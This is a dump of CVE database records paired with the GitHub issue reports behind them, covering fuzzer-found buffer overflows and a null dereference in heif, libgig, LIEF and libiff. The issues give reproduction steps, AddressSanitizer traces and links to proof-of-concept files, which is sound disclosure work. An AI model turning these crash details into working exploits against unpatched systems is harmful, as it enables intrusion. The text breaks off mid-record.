[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/87" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/87" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nokia:heif:*:*:*:*:*:*:*:*", "matchCriteriaId": "665D3535-EF3B-45AF-9DE9-8A7AF5A34D4F", "versionEndExcluding": null, "versionEndIncluding": "3.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/nokiatech/heif/issues/87
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nokiatech", "heif" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), heif (latest master [2fc78e](https://github.com/nokiatech/heif/commit/2fc78e4c80e9dbd22b5b0e09c137985d21d75512)) ## Configure cmake ../srcs -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line modify example.cpp, use example7() to receive filename from command-line. ./build/bin/example @@ ## AddressSanitizer output ``` ================================================================= ==13301==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000009536e0 at pc 0x0000008203ca bp 0x7ffc75603000 sp 0x7ffc75602ff8 READ of size 2 at 0x0000009536e0 thread T0 #0 0x8203c9 in HevcDecoderConfigurationRecord::getPicHeight() const /home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:317:38 #1 0x8826dd in HEIF::WriterImpl::getConfigIndex(HEIF::DecoderConfigId, unsigned short&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:1199:98 #2 0x87e1bf in HEIF::WriterImpl::addImage(HEIF::MediaDataId const&, HEIF::ImageId&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:199:31 #3 0x52072f in main /home/seviezhou/heif/srcs/examples/example.cpp:104:29 #4 0x7f3f5488883f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #5 0x41f0b8 in _start (/home/seviezhou/heif/build/bin/example+0x41f0b8) 0x0000009536e0 is located 32 bytes to the left of global variable '<string literal>' defined in '/usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:960:29' (0x953700) of size 74 '<string literal>' is ascii string 'vector::_M_range_check: __n (which is %zu) >= this->size() (which is %zu)' 0x0000009536e0 is located 31 bytes to the right of global variable 'typeinfo name for HevcDecoderConfigurationRecord' defined in '/home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp' (0x9536a0) of size 33 'typeinfo name for HevcDecoderConfigurationRecord' is ascii string '30HevcDecoderConfigurationRecord' SUMMARY: AddressSanitizer: global-buffer-overflow /home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:317:38 in HevcDecoderConfigurationRecord::getPicHeight() const Shadow bytes around the buggy address: 0x000080122680: 00 00 00 00 00 00 00 00 00 00 00 00 00 07 f9 f9 0x000080122690: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801226a0: 00 00 00 00 00 00 07 f9 f9 f9 f9 f9 00 00 00 00 0x0000801226b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801226c0: 00 00 00 00 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 =>0x0000801226d0: f9 f9 f9 f9 00 00 00 00 01 f9 f9 f9[f9]f9 f9 f9 0x0000801226e0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9 0x0000801226f0: 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 0x000080122700: 00 00 00 02 f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 0x000080122710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080122720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==13301==ABORTING ``` ## POC [global-overflow-getPicWidth-hevcdecoderconfigrecord-317.zip](https://github.com/nokiatech/heif/files/5022502/global-overflow-getPicWidth-hevcdecoderconfigrecord-317.zip)
A global-buffer-overflow in hevcdecoderconfigrecord.cpp:317:38
https://api.github.com/repos/nokiatech/heif/issues/87/comments
1
2020-08-04T14:03:20Z
2020-08-12T09:13:08Z
https://github.com/nokiatech/heif/issues/87
672,818,230
87
2,531
CVE-2021-32289
2021-09-20T16:15:10.870
An issue was discovered in heif through through v3.6.2. A NULL pointer dereference exists in the function convertByteStreamToRBSP() located in nalutil.cpp. It allows an attacker to cause Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/85" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nokiatech/heif/issues/85" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nokia:heif:*:*:*:*:*:*:*:*", "matchCriteriaId": "665D3535-EF3B-45AF-9DE9-8A7AF5A34D4F", "versionEndExcluding": null, "versionEndIncluding": "3.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/nokiatech/heif/issues/85
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nokiatech", "heif" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), heif (latest master [2fc78e](https://github.com/nokiatech/heif/commit/2fc78e4c80e9dbd22b5b0e09c137985d21d75512)) ## Configure cmake ../srcs -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line modify example.cpp, use example7() to receive filename from commandline. ./build/bin/example @@ ## Output ``` Segmentation fault ``` ## AddressSanitizer output ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==63742==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005aebf2 bp 0x00000017e040 sp 0x7ffe4944ccd0 T0) ==63742==The signal is caused by a READ memory access. ==63742==Hint: address points to the zero page. #0 0x5aebf1 in _ZNSt16allocator_traitsI9AllocatorIhEE12_S_constructIhJRKhEEENSt9enable_ifIXsr6__and_ISt6__and_IJSt6__not_INS2_18__construct_helperIT_JDpT0_EE4typeEESt16is_constructibleISA_JSC_EEEEEE5valueEvE4typeERS1_PSA_DpOSB_ /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:250:26 #1 0x5aebf1 in _ZNSt16allocator_traitsI9AllocatorIhEE9constructIhJRKhEEEDTcl12_S_constructfp_fp0_spclsr3stdE7forwardIT0_Efp1_EEERS1_PT_DpOS6_ /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:344 #2 0x5aebf1 in unsigned char* std::__uninitialized_copy_a<__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, unsigned char*, Allocator<unsigned char> >(__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, unsigned char*, Allocator<unsigned char>&) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_uninitialized.h:275 #3 0x6ed80a in void std::vector<unsigned char, Allocator<unsigned char> >::_M_range_insert<__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > > >(__gnu_cxx::__normal_iterator<unsigned char*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, std::forward_iterator_tag) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/vector.tcc:729:11 #4 0x6ec4bb in void std::vector<unsigned char, Allocator<unsigned char> >::_M_insert_dispatch<__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > > >(__gnu_cxx::__normal_iterator<unsigned char*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, std::__false_type) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:1549:4 #5 0x6ec4bb in __gnu_cxx::__normal_iterator<unsigned char*, std::vector<unsigned char, Allocator<unsigned char> > > std::vector<unsigned char, Allocator<unsigned char> >::insert<__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, void>(__gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >, __gnu_cxx::__normal_iterator<unsigned char const*, std::vector<unsigned char, Allocator<unsigned char> > >) /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/stl_vector.h:1270 #6 0x82d4ee in convertByteStreamToRBSP(std::vector<unsigned char, Allocator<unsigned char> > const&) /home/seviezhou/heif/srcs/common/nalutil.cpp:49:10 #7 0x81b114 in HevcDecoderConfigurationRecord::makeConfigFromSPS(std::vector<unsigned char, Allocator<unsigned char> > const&) /home/seviezhou/heif/srcs/common/hevcdecoderconfigrecord.cpp:52:27 #8 0x88172d in HEIF::(anonymous namespace)::createHevcDecoderConfigurationRecord(HEIF::Array<HEIF::DecoderSpecificInfo> const&, HevcDecoderConfigurationRecord&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:112:34 #9 0x88172d in HEIF::WriterImpl::getConfigIndex(HEIF::DecoderConfigId, unsigned short&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:1191 #10 0x87e1bf in HEIF::WriterImpl::addImage(HEIF::MediaDataId const&, HEIF::ImageId&) /home/seviezhou/heif/srcs/writer/writermetaimpl.cpp:199:31 #11 0x52072f in main /home/seviezhou/heif/srcs/examples/example.cpp:104:29 #12 0x7f7cca1e283f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41f0b8 in _start (/home/seviezhou/heif/build/bin/example+0x41f0b8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/alloc_traits.h:250:26 in _ZNSt16allocator_traitsI9AllocatorIhEE12_S_constructIhJRKhEEENSt9enable_ifIXsr6__and_ISt6__and_IJSt6__not_INS2_18__construct_helperIT_JDpT0_EE4typeEESt16is_constructibleISA_JSC_EEEEEE5valueEvE4typeERS1_PSA_DpOSB_ ==63742==ABORTING ``` ## POC [SEGV-convertByteStreamToRBSP-nalutil-49.zip](https://github.com/nokiatech/heif/files/5020862/SEGV-convertByteStreamToRBSP-nalutil-49.zip)
A Segmentation fault in nalutil.cpp:49:10
https://api.github.com/repos/nokiatech/heif/issues/85/comments
1
2020-08-04T07:55:57Z
2020-08-12T09:10:38Z
https://github.com/nokiatech/heif/issues/85
672,587,806
85
2,532
CVE-2021-32294
2021-09-20T16:15:10.917
An issue was discovered in libgig through 20200507. A heap-buffer-overflow exists in the function RIFF::List::GetSubList located in RIFF.cpp. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drbye78/libgig/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/drbye78/libgig/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxsampler:libgig:*:*:*:*:*:*:*:*", "matchCriteriaId": "292FD88A-E0C8-4C09-AE90-24952EC922FE", "versionEndExcluding": null, "versionEndIncluding": "20200507", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/drbye78/libgig/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "drbye78", "libgig" ]
The User account creation has been disabled in Bugzilla, so I have to report it here. ## System info Ubuntu x86_64, gcc (Ubuntu 5.5.0-12ubuntu1), gigextract (latest master [237fd8](https://github.com/drbye78/libgig/commit/237fd8a12825717eaa648fb12e6b8bddd93032e6)) ## Command line ./src/tools/gigextract @@ /tmp/libgig ## AddressSanitizer output ``` ==80141==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60700000de40 at pc 0x0000004399ac bp 0x7ffd832c3e70 sp 0x7ffd832c3e60 READ of size 4 at 0x60700000de40 thread T0 #0 0x4399ab in RIFF::List::GetSubList(unsigned int) /home/seviezhou/libgig/src/RIFF.cpp:1151 #1 0x4660d6 in gig::File::LoadGroups() /home/seviezhou/libgig/src/gig.cpp:6960 #2 0x4e360b in gig::File::LoadSamples(RIFF::progress_t*) /home/seviezhou/libgig/src/gig.cpp:6346 #3 0x4a1774 in gig::File::GetFirstSample(RIFF::progress_t*) /home/seviezhou/libgig/src/gig.cpp:6237 #4 0x40cd3a in ExtractSamples(gig::File*, char*, std::map<unsigned int, bool, std::less<unsigned int>, std::allocator<std::pair<unsigned int const, bool> > >*) /home/seviezhou/libgig/src/tools/gigextract.cpp:212 #5 0x40651c in main /home/seviezhou/libgig/src/tools/gigextract.cpp:162 #6 0x7f9a0810d83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #7 0x4082f8 in _start (/home/seviezhou/libgig/src/tools/gigextract+0x4082f8) 0x60700000de40 is located 0 bytes to the right of 80-byte region [0x60700000ddf0,0x60700000de40) allocated by thread T0 here: #0 0x7f9a092ca532 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99532) #1 0x437f48 in RIFF::List::LoadSubChunks(RIFF::progress_t*) /home/seviezhou/libgig/src/RIFF.cpp:1508 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/libgig/src/RIFF.cpp:1151 RIFF::List::GetSubList(unsigned int) Shadow bytes around the buggy address: 0x0c0e7fff9b70: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0e7fff9b80: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff9b90: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c0e7fff9ba0: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 0x0c0e7fff9bb0: 00 00 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 =>0x0c0e7fff9bc0: 00 00 00 00 00 00 00 00[fa]fa fa fa 00 00 00 00 0x0c0e7fff9bd0: 00 00 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 0x0c0e7fff9be0: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 0x0c0e7fff9bf0: 00 00 fa fa fa fa 00 00 00 00 00 00 00 00 00 00 0x0c0e7fff9c00: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa 0x0c0e7fff9c10: fa fa 00 00 00 00 00 00 00 00 00 00 fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==80141==ABORTING ``` ## POC [heap-overflow-GetSubList-RIFF-1151.zip](https://github.com/drbye78/libgig/files/5078845/heap-overflow-GetSubList-RIFF-1151.zip)
A heap-buffer-overflow in RIFF.cpp:1151
https://api.github.com/repos/drbye78/libgig/issues/1/comments
0
2020-08-15T14:27:18Z
2020-08-15T14:27:18Z
https://github.com/drbye78/libgig/issues/1
679,583,552
1
2,533
CVE-2021-32297
2021-09-20T16:15:10.963
An issue was discovered in LIEF through 0.11.4. A heap-buffer-overflow exists in the function main located in pe_reader.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/449" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/lief-project/LIEF/issues/449" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lief-project:lief:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE7CEECE-1180-4112-B47D-5DDC6362F33E", "versionEndExcluding": null, "versionEndIncluding": "0.11.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/lief-project/LIEF/issues/449
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "lief-project", "LIEF" ]
## System info Ubuntu x86_64, gcc, pe_reader (latest master [4bbe410](https://github.com/lief-project/LIEF/commit/4bbe410333c0d727df6bc1f3bc92d4d5adc4726e)) ## Configure cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" ## Command line ./build/examples/c/pe_reader @@ ## AddressSanitizer output ``` ================================================================= ==64198==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ea12 at pc 0x00000041167a bp 0x7ffeab862260 sp 0x7ffeab862250 READ of size 1 at 0x60200000ea12 thread T0 #0 0x411679 in main /home/seviezhou/lief/examples/c/pe_reader.c:133 #1 0x7f70317d283f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #2 0x4212d8 in _start (/home/seviezhou/experiment-3/AlphaFuzz-lief/test/pe_reader+0x4212d8) 0x60200000ea12 is located 1 bytes to the right of 1-byte region [0x60200000ea10,0x60200000ea11) allocated by thread T0 here: #0 0x7f7032518602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x42585f in LIEF::PE::init_c_sections(Pe_Binary_t*, LIEF::PE::Binary*) /home/seviezhou/lief/api/c/PE/Section.cpp:31 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/seviezhou/lief/examples/c/pe_reader.c:133 main Shadow bytes around the buggy address: 0x0c047fff9cf0: fa fa fa fa fa fa 00 00 fa fa 00 fa fa fa 00 fa 0x0c047fff9d00: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9d10: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9d20: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa 0x0c047fff9d30: fa fa 00 fa fa fa 01 fa fa fa 01 fa fa fa 01 fa =>0x0c047fff9d40: fa fa[01]fa fa fa 01 fa fa fa 01 fa fa fa fd fd 0x0c047fff9d50: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d60: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9d70: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fd 0x0c047fff9d80: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd 0x0c047fff9d90: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==64198==ABORTING ``` ## POC [heap-overflow-main-pe_reader-133.zip](https://github.com/lief-project/LIEF/files/5041497/heap-overflow-main-pe_reader-133.zip)
A heap overflow in pe_reader.c:133 (not issue in the library)
https://api.github.com/repos/lief-project/LIEF/issues/449/comments
1
2020-08-07T13:04:22Z
2020-08-27T09:19:16Z
https://github.com/lief-project/LIEF/issues/449
675,002,426
449
2,534
CVE-2021-32298
2021-09-20T16:15:11.007
An issue was discovered in libiff through 20190123. A global-buffer-overflow exists in the function IFF_errorId located in error.c. It allows an attacker to cause code Execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svanderburg/libiff/issues/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/svanderburg/libiff/issues/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libiff_project:libiff:*:*:*:*:*:*:*:*", "matchCriteriaId": "60CE841D-B2B4-44B1-BF11-6C326887388D", "versionEndExcluding": null, "versionEndIncluding": "20190123", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/svanderburg/libiff/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "svanderburg", "libiff" ]
## System info Ubuntu X64, gcc (Ubuntu 5.5.0-12ubuntu1), iffpp (latest master [0290be4](https://github.com/svanderburg/libiff/commit/0290be4ed3df0c1b8e8f5c24012cc75ba8870570)) ## Configure CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" ./configure ## Command line ./src/iffpp/.libs/lt-iffpp @@ ## Output ## AddressSanitizer output ``` ==2975==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7ff1289d83a1 at pc 0x7ff1289d7710 bp 0x7ffc77e7d770 sp 0x7ffc77e7d768 READ of size 1 at 0x7ff1289d83a1 thread T0 #0 0x7ff1289d770f in IFF_errorId /home/seviezhou/libiff/src/libiff/error.c:46:18 #1 0x7ff1289d77cd in IFF_readError /home/seviezhou/libiff/src/libiff/error.c:52:5 #2 0x7ff1289c7dc9 in IFF_readId /home/seviezhou/libiff/src/libiff/id.c:42:2 #3 0x7ff1289c93c4 in IFF_readChunk /home/seviezhou/libiff/src/libiff/chunk.c:54:9 #4 0x7ff1289cd295 in IFF_readGroup /home/seviezhou/libiff/src/libiff/group.c:80:21 #5 0x7ff1289d0754 in IFF_readForm /home/seviezhou/libiff/src/libiff/form.c:45:23 #6 0x7ff1289c9856 in IFF_readChunk /home/seviezhou/libiff/src/libiff/chunk.c:64:21 #7 0x7ff1289d78f3 in IFF_readFd /home/seviezhou/libiff/src/libiff/iff.c:35:13 #8 0x7ff1289d7b48 in IFF_read /home/seviezhou/libiff/src/libiff/iff.c:65:13 #9 0x5167b3 in IFF_prettyPrint /home/seviezhou/libiff/src/iffpp/pp.c:33:10 #10 0x516477 in main /home/seviezhou/libiff/src/iffpp/main.c:137:12 #11 0x7ff127acb83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #12 0x41a478 in _start (/home/seviezhou/libiff/src/iffpp/.libs/lt-iffpp+0x41a478) 0x7ff1289d83a1 is located 63 bytes to the left of global variable '<string literal>' defined in 'chunk.c:58:49' (0x7ff1289d83e0) of size 10 '<string literal>' is ascii string 'chunkSize' 0x7ff1289d83a1 is located 0 bytes to the right of global variable '<string literal>' defined in 'chunk.c:54:35' (0x7ff1289d83a0) of size 1 '<string literal>' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /home/seviezhou/libiff/src/libiff/error.c:46:18 in IFF_errorId Shadow bytes around the buggy address: 0x0ffea5133020: 00 00 00 f9 f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9 0x0ffea5133030: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 